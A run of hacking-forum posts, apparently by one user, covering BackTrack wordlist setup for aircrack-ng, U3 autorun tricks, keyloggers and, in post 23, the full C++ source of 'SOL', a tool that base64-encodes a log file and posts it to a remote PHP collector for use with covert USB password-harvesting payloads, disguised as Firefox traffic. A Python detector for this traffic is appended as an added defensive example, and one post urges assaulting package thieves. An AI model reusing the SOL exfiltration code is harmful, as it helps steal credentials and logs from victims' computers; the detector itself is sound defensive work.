    How about trying it with SOL (Send Outgoing Log) instead of that gmail crap! Do you really want to expose your gmail password? If you're going to use a skiddie tool, count on being found out. At least if you use something that doesn't reveal passwords... (like SOL) At least you won't get pwned ;) The idea is to pwn without being pwned yourself! It's like saying here's my gmail password just sitting in an unencrypted plain text file! Come and get it! lol
  18. Your USB BT3 is a live version, right? Whereas it's like a live CD/DVD but on USB! (That is how I have mine set up.) First get a wordlist... Once you have a wordlist, you could just place it on your USB drive anywhere (recommend just putting it on the root of your USB drive), then you can find it in the /mnt folder once you boot up; you should find your USB drive in there in like sdb1 or something like that. Locate the wordlist and maybe copy it into your /root folder so you don't have to cd to the /mnt/sdb1 directory when you execute the aircrack-ng command...

     ```
     cp /mnt/sdb1/wordlist.txt /root
     ```

     I suspect you're probably doing your aircracking from your /root folder. If your prompt looks like this:

     ```
     bt ~ #
     ```

     then you are... You can type "ls" to list the files in that folder; it's the same folder that the shortcut called "Home" on the desktop opens to...

     Now let's say instead of having to copy that wordlist into your /root folder every time you boot, you could create a slax module (.lzm) so that every time you boot, the wordlist is automatically in your root folder ;) To do this it's simple...

     First make a folder which is what you will use to create the lzm file:

     ```
     mkdir /wordlists
     ```

     Now make a folder called "root" inside of the wordlists folder:

     ```
     mkdir /wordlists/root
     ```

     Copy the wordlist(s) into the /wordlists/root folder!

     ```
     cp /mnt/sdb1/wordlist.txt /wordlists/root
     cp /mnt/sdb1/wordlist2.txt /wordlists/root
     ```

     Now you're ready to create the .lzm file:

     ```
     cd /
     dir2lzm /wordlists wordlists.lzm
     ```

     Now all you have to do is add the wordlists.lzm file into your 'BT3/modules' folder (again, if your USB is not called 'sdb1' then adjust the next line):

     ```
     cp /wordlists.lzm /mnt/sdb1/BT3/modules
     ```

     Now re-boot from your USB drive! What will happen is when booting, aside from all the .lzm files it extracts by default, it will also extract your "wordlists.lzm"; it extracts all .lzm files to the / folder during boot up. So suppose your .lzm file contains for example: /root/wordlist.txt, then wordlist.txt will now be in the /root folder after boot! ;)

     That's how easily extensible BT3 is! You can easily add files you want auto-loaded with BT3 just by adding .lzm's to the modules folder! Here's a guide I made if you need more info, or if you want to install a newer driver that's ready to go upon boot! http://forums.remote-exploit.org/showthread.php?p=104179
  19. I verified the same on my friends Vista (I don't have Vista myself) It does not autorun, instead it popup's for the cd-rom partition if you want to run it. And for the USB partition it pops up asking if you wan to open the folder to view the files... I tested with a Sandisk Cruzer Micro U3 drive. So maybe CD-Autorun is off by default in vista? I should try just a CD to see if maybe Vista can tell the difference between a real CD-ROM and the emulated CD-ROM? Anyway it probably can be changed with a registry key! but you'd have to do it before inserting your drive. Maybe run regmon by sysinternals and see what registry key(s) are changed when you change the setting to allow cd's to autorun. (if there is even such a setting) @Verye: what do you mean by "picture CDs"? Do you mean ones that have an icon?
  20. Steve8x

    PS2 key logger

    Hardware logger? Seems more detectable to me than a software logger (since there's actually a physical object that can be found and identified). PS2? At first I thought you were talking about a PlayStation 2, but I was trying to think how that would work when the PS2 doesn't have a keyboard lol. But you actually mean a PS/2 port for keyboard/mouse. It wouldn't even work on me, my PC does not have PS/2 ports. My keyboard and mouse plug in through USB, so it won't work on every PC ;)
  21. I understand your frustration, although I don't live in the city so I don't have people like that stealing my packages! Are they actually reaching inside your house or grabbing the package off your porch or what? What you should maybe do is set up surveillance and leave more dummy packages. Catch the guy(s) who are doing it and maybe go and kick his ass(es) for stealing your packages! I would be so pissed if there were people stealing packages I was getting... I mean, what do you do in a situation like that? You just lose whatever you paid for? Since there's no signature it doesn't seem like you can claim you did not receive your package! What you have to do is get these fucks scared of coming around your house. However you do that is up to you. Ideally you'd want it so they don't ever come around... How about getting a guard dog maybe? Or maybe a sign that says, "No stealing my packages, violators will be shot!" ;)
  22. Well, don't worry, PHP is easy! It's one of the easiest coding languages to learn! Automate submitting an online form? Yes, it's possible... My new app does just the thing. It automates posting a form... http://hak5.org/forums/index.php?showtopic=10535
  23. Recently people have generated interest in my idea of posting log files to a server sided php script for storage in a MySQL database! So I have come up with a command line utility that can be used with switchblades/hacksaws in batch scripting... It's simple to use, here's the syntax:

        sol [-p port] [-h host] [-s script] [-f file]

    ex.

        sol -p 8080 -h myaccount.myhost.com -s /path/to/script.php -f file.txt
        sol -h popeax.com -s /test/index.php -f test.txt

    The port parameter is optional but the other three are required... Port 80 is assumed if the port is not specified... The parameters can be specified in any order actually, but I thought this order makes the most sense...

    Here's how it works. It first reads the entire file into memory (note: this is meant for sending things like text files/log files, not really binary files, although it would work). Once the file is in memory it encodes it with base64 (other encoding can be used but I like this one, even though it makes the file slightly larger). Then it sets up the HTTP header to post to the page, as if it were a Firefox 3.0.1 web browser. It posts two variables to the php script on the server, t and f. t stands for title; it is just the file name of the file being posted. f stands for file; it is all the data contained in the file encoded with base64. So your php script receiving the data has to correspond. I am providing the php files so don't worry...

    On the php side, the server sided script will receive the posted data; it will be as if you took the contents of the file and posted them to a form on your web site ;) The data is then inserted into the database still in its encoded form. When you want to view the logs you visit your script and log in with a username and password that you specify in the php file. It's important that you change it from the default of user "root" password "root". Then you can see info about the logs posted, and click a link to view the contents of each file.
    When you view a log, the page prints the encoded log into a textarea box, and some javascript code decodes it and displays the decoded contents in the same box... I found php's base64_decode() function would screw up and return an empty string if the decoded content contained any special characters. (Maybe I was just doing something wrong?) Well, with the javascript I've gotten it to work nicely! I've successfully posted a log over 100KB in size (larger than logs usually are, so this should work great!) and also successfully posted a log with special characters!

    You can log in and view my test page here: popeax.com/test/index.php username: root && password: root

    All that is required is a free web host that offers php + mysql (at least 1 database). If you need help finding one, here's a great link that has many: http://www.free-webhosts.com/free-mysql-database.php

    Here you can download the php files: http://popeax.com/test/recv.zip

    For the php files you'll have to modify config.php so that the database info matches your mysql database, and also change the default username and password to actually log in to view the logs!

    Coded in MSVC++ 2008, here's the source + binary to SOL (look in the release folder for the binary): http://popeax.com/test/sol.zip

    It should work on any Windows machine, with no dependencies (winsock doesn't count as a dependency since everyone has it).

    Here's an image I took when I uploaded a test file:

    Oh, and I left out the encryption part for now because I couldn't get it to work right! So we'll have to do without it for now until we get that to work right!
    Happy Hakoween :)

    [sol.cpp]

        //Send Outgoing Logfile(SOL)
        //A command line app which sends a logfile
        //to a server sided php script for processing
        //Written By Steve8x
        #include "sol.h"

        char* host = new char[260];
        char* path = new char[260];
        char* file = new char[260];
        char* pword = new char[260];
        int port = 80; //default port

        int main(int NumParams, char* Cmd[])
        {
            system("color 0A");
            memset(host, 0, 260);
            memset(path, 0, 260);
            memset(file, 0, 260);
            memset(pword, 0, 260);
            //strcpy(pword, "hak5");

            if(NumParams < 2)
            {
                printf("\nUsage: sol [-p port] [-h host] [-s script] [-f file] \n");
                printf("Examples:\n");
                printf("sol -p 8080 -h myhost.com -s /path/to/script.php -f file.txt\n");
                printf("sol -h host1337.com -s /usr/bin/script.php -f file.txt\n");
                return 0;
            }

            //Get Parameters!
            //(i + 1 < NumParams so a switch given last, with no value, is never dereferenced;
            // strncpy with 259 keeps the zeroed 260-byte buffers terminated)
            for(int i = 1; i + 1 < NumParams; i++)
            {
                if(strcmp(Cmd[i], "-p") == 0) { port = atoi(Cmd[i+1]); }
                if(strcmp(Cmd[i], "-h") == 0) { strncpy(host, Cmd[i+1], 259); }
                if(strcmp(Cmd[i], "-s") == 0) { strncpy(path, Cmd[i+1], 259); }
                if(strcmp(Cmd[i], "-f") == 0) { strncpy(file, Cmd[i+1], 259); }
            }

            if(host[0] == 0 || path[0] == 0 || file[0] == 0)
            {
                printf("\nhost, script, file parameters are required\n");
                return 0;
            }

            //Init winsock 2.2
            WSADATA wsaData = {0};
            WSAStartup(MAKEWORD(2, 2), &wsaData);

            printf("\n\nConnecting to-> %s:%i", host, port);
            printf("\nPosting to script-> %s", path);
            printf("\nFile being sent-> %s\n\n", file);

            if(LoadFileIntoMemory() == 0)
            {
                printf("Could Not Open \"%s\"", file);
                return 0;
            }

            //lets leave the encryption out for now until we can get it to work right!
            //encrypt the file in memory
            //XORbuffer(fbuff, fsize, pword);

            //encode with base64 for transfer
            sendme = base64_encode((const unsigned char*)fbuff, fsize);
            printf("Original File Size: %u bytes\nAfter Encoding: %u bytes\n",
                   (unsigned)fsize, (unsigned)sendme.size());

            SendFile();

            delete[] host;
            delete[] path;
            delete[] file;
            delete[] pword;
            delete[] fbuff;
            return 1;
        }

        bool SendFile()
        {
            //Create A Client Object! This Will Act As A Firefox Web Browser
            //Max value for mediumblob is 16383 KB
            //But we wont ever send a log file that big
            //So lets make max 1024KB (1MB) even though you wont even send that much
            xClient* cli = new xClient;
            char* postdata = new char[1048576];
            unsigned long datalength = 0;
            ZeroMemory(postdata, 1048576);

            datalength = (strlen(file) + sendme.size() + 5); //(+5 because "t=&f=" count as content)

            //%lu because datalength is an unsigned long
            sprintf(postdata,
                    "POST %s HTTP/1.1\r\n"
                    "Host: %s\r\n"
                    "User-Agent: %s\r\n"
                    "Accept: %s\r\n"
                    "Keep-Alive: 300\r\n"
                    "connection: keep-alive\r\n"
                    "Referer: http://localhost/pwned.php\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n"
                    "Content-Length: %lu\r\n\r\n"
                    "t=%s&f=",
                    path, host, UserAgent.c_str(), Accept.c_str(), datalength, file);

            sendme.insert(0, postdata);

            if(cli->ConnectToServer(host, port) == 0)
            {
                printf("\nFailed to connect to server!\n");
                ExitProcess(0);
            }

            //Post logfile to database :)
            sendx(cli->serversock, (char*)sendme.c_str(), sendme.size());
            cli->Close();
            printf("\n\nFile Sent Successfully!\n\n");

            //just so you get an idea of what was sent to the webserver
            //keep this commented out
            //f = fopen("SentData.txt", "wb");
            //fwrite(sendme.c_str(), sendme.size(), 1, f);
            //fclose(f);

            //Clean up
            delete cli;
            delete[] postdata;
            return TRUE;
        }

        long getfilesize(FILE* f)
        {
            long temp;
            fseek(f, 0, SEEK_END);
            temp = ftell(f);
            rewind(f);
            return temp;
        }

        bool LoadFileIntoMemory()
        {
            f = fopen(file, "rb");
            if(!f)
                return FALSE;
            fsize = getfilesize(f);
            fbuff = new char[fsize];
            fread(fbuff, fsize, 1, f);
            fclose(f);
            return TRUE;
        }

        // Simple Encryption -- currently not used...
        void XORbuffer(char* buff, DWORD buffsize, char* pass)
        {
            int x = 0;
            int passlength = strlen(pass);
            for(DWORD i = 0; i < buffsize; i++)
            {
                if(x == passlength) { x = 0; }
                buff[i] ^= pass[x]; // ^ means XOR in c++;)
                x++;
            }
        }
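
A defender's view of the request post 23 describes, as an added example that is not Steve8x's code: it checks a captured HTTP request for three traits visible in sol.cpp (a Firefox User-Agent without the headers a browser sends alongside it, the hard-coded localhost Referer on a request to another host, and a `t`/`f` form body whose `f` value is raw, unescaped base64). The host names, paths, User-Agent string, payload and indicator names are constructed for illustration.

```python
import base64
import re

# Constructed samples. SOL_REQ mirrors the header set and "t=<name>&f=<base64>"
# body that sol.cpp builds; host, path, UA string and payload are made up here.
_B64 = base64.b64encode(b"user=alice pass=constructed\n").decode()  # ends in "=="
_BODY = "t=log.txt&f=" + _B64
SOL_REQ = ("POST /logs/recv.php HTTP/1.1\r\nHost: collector.example\r\n"
           "User-Agent: Mozilla/5.0 (Windows; U) Firefox/3.0.1\r\nAccept: text/html\r\n"
           "Keep-Alive: 300\r\nconnection: keep-alive\r\n"
           "Referer: http://localhost/pwned.php\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n"
           f"Content-Length: {len(_BODY)}\r\n\r\n" + _BODY)
# A browser percent-encodes "+", "/" and "=" inside form values ("=" -> %3D).
BROWSER_REQ = ("POST /contact.php HTTP/1.1\r\nHost: shop.example\r\n"
               "User-Agent: Mozilla/5.0 (Windows; U) Firefox/3.0.1\r\n"
               "Accept-Language: en-us\r\nAccept-Encoding: gzip,deflate\r\n"
               "Referer: http://shop.example/contact.php\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               "Content-Length: 20\r\n\r\nt=hello&f=aGVsbG8%3D")

RAW_B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
LOCAL_REF = re.compile(r"https?://(localhost|127\.0\.0\.1)(:\d+)?/")

def sol_indicators(raw):
    """Return the list of SOL-style traits found in one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    hits = []
    # 1. Claims to be Firefox but omits headers a real browser always adds.
    if "Firefox/" in headers.get("user-agent", "") and \
            not {"accept-language", "accept-encoding"}.issubset(headers):
        hits.append("firefox-ua-missing-browser-headers")
    # 2. Referer points at localhost while the request goes to another host.
    if LOCAL_REF.match(headers.get("referer", "")) and \
            not headers.get("host", "").startswith(("localhost", "127.")):
        hits.append("localhost-referer-to-remote-host")
    # 3. Body is exactly t and f, with f as valid base64 that was never escaped.
    fields = dict(p.partition("=")[::2] for p in body.split("&") if p)
    f = fields.get("f", "")
    if set(fields) == {"t", "f"} and RAW_B64.fullmatch(f) and re.search(r"[+/=]", f):
        try:
            base64.b64decode(f, validate=True)
            hits.append("raw-unescaped-base64-form-value")
        except ValueError:
            pass
    return hits
```
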
  24. I had tried this a long time ago, and I recently tried it again; it does not work for me! I have an Apache web server running on my machine... If I modify my hosts file and point u3.sandisk.com to When I try to run lpinstaller it fails immediately! It says "Download of u3 launchpad failed!" exactly like this image that someone posted: It does not even seem like it tries to download it, and just immediately says download failed! I have my directory structure set up correctly, you can double check: http://popeax.com/download/apps/lpinstaller/isofiles/ (popeax.com is my domain name, which forwards to my IP address). Also you claim: Step 8. None of the data on the flash partition will not be touched. When I ran it, it said my data would have to be backed up, and it gave me the option to back up the data or format the drive!!! <_< I had downloaded the latest version of lpinstaller from the website too! Also, I tried looking through the EXE in olly and a hex editor and I did not find "u3.sandisk.com" or "/download/apps/lpinstaller/isofiles/" or anything in between! Not in ASCII or Unicode!! So I'm not sure how you found those strings. If I could find those strings I could easily mod it to point somewhere else since the EXE is not packed! But it still probably won't work (at least for me). The closest thing I found was "u3.com" but that's all... Anyways, I don't have Vista but I don't see why that would matter...
  25. Just remember, winners don't do wares! ;)